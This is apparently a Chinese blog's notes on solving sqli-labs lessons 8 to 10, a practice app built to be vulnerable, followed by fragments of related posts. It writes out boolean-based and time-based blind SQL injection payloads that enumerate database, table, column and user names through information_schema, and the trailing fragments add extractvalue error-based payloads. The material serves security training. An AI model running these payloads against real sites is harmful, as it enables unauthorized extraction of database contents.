sqli labs闖關筆記 less8 10 盲注

2022-09-09 15:57:23 字數 2176 閱讀 7684

一、布林型盲注,布林盲注與less6思路一致。

1、查詢注入點

輸入單引號,you are in消失,證明存在注入點。

找到閉合引數的方法,單引號後面直接加注釋,you are in出現,證明閉合方式正確。

2、猜資料庫名

' and left((select database()),1)='s'--  

3、猜表名

' and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),1,1))>100-- 

4、猜欄位

' and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),1,1)) >1 -- 

5、猜字段的值

' and ascii(substr((select username from security.users limit 1,1),1,1)) >1 -- 

二、時間型盲注

當存在注入漏洞時,可以使用延遲注入進行判斷,此時若存在漏洞,則睡眠5s之後再返回結果。if(condition,a,b)如果條件condition為true,則執行語句a,否則執行b

1. ' and sleep(5) -- 使用延遲的方法判斷是否存在注入漏洞。當然判斷是否存在注入漏洞的方法很多。

2. ' and if(length(database()) = 8,1,sleep(5)) -- 當為8的時候很快載入,而為其他值得時候載入較慢(5s左右),那就說明此時資料庫的長度就是8(security)

3. ' and if(ascii(substr((select database()),1,1)) >113,1,sleep(5)) -- 如果當前資料庫的第乙個字母的ascii值大於113的時候,會立刻返回結果,否則執行5s。

4. ' and if(ascii(substr((select schema_name from information_schema.schemata limit 4,1),1,1))>112,1,sleep(5)) -- 同理判斷資料庫中的第5個資料庫的第一位的ascii的值是不是大於112(實際中是115),如果是的則速度返回,否則延時5s返回結果。

5. 其餘步驟與法一基本類似,可以採用burpsuite或者是sql盲注指令碼使用。

less9只能用基於時間的盲注查詢注入點了。

1、查詢注入點

輸入單引號、雙引號、單引號+括號等方式頁面都沒有任何反應,嘗試使用基於時間的盲注來進行注入點判斷。

加入sleep函式,介面會反應5秒,證明注入點存在。

增加sleep函式後用時較長

2、通過返回時間進行判斷,此時如果資料庫長度為8,則可以較快返回。

' and if(length(database())=8,1,sleep(5)) --
3、使用下屬方法逐步猜解資料庫名、資料庫表名、資料庫欄位等。

' and if(ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1))>1,1,sleep(5)) --
less10與less9一樣,只是基於雙引號,不再贅述。

判斷注入點,介面會反應5秒,證明注入點存在。

" and sleep(5)--

Sqli Labs闖關 更新中

正常訪問 一 判斷 1 and1 2 訪問正常,不是數值查詢 1 報錯,可能為sql字元注入1 返回正常,所以為單引號字元注入 注 1 我使用的是 來注釋sql後面的語句,的作用是,它在解析的時候會被解析為空格,用來隔開 與後面語句。2 注釋也是可行的,但在瀏覽器的url中,他是被用來指導瀏覽器動作...

sqli labs闖關之61 65關

最後五關!第六十一關 和六十關基本一樣,就是變成了單括號和雙括號,這好像是第一次遇見雙括號 爆資料庫名 id 1 and extractvalue 1,concat 0x5c,select database 23 爆表名 id 0 union select extractvalue 1,concat...

Sqli labs 學習筆記

資料庫的連線函式 concat和concat ws concat ws的第乙個引數是連線字串的分隔符。user 返回當前資料庫連線使用的使用者 database 返回當前資料庫連線使用的資料庫 version 返回當前資料庫的版本 127.0.0.1 sqli labs less 1 id 1 un...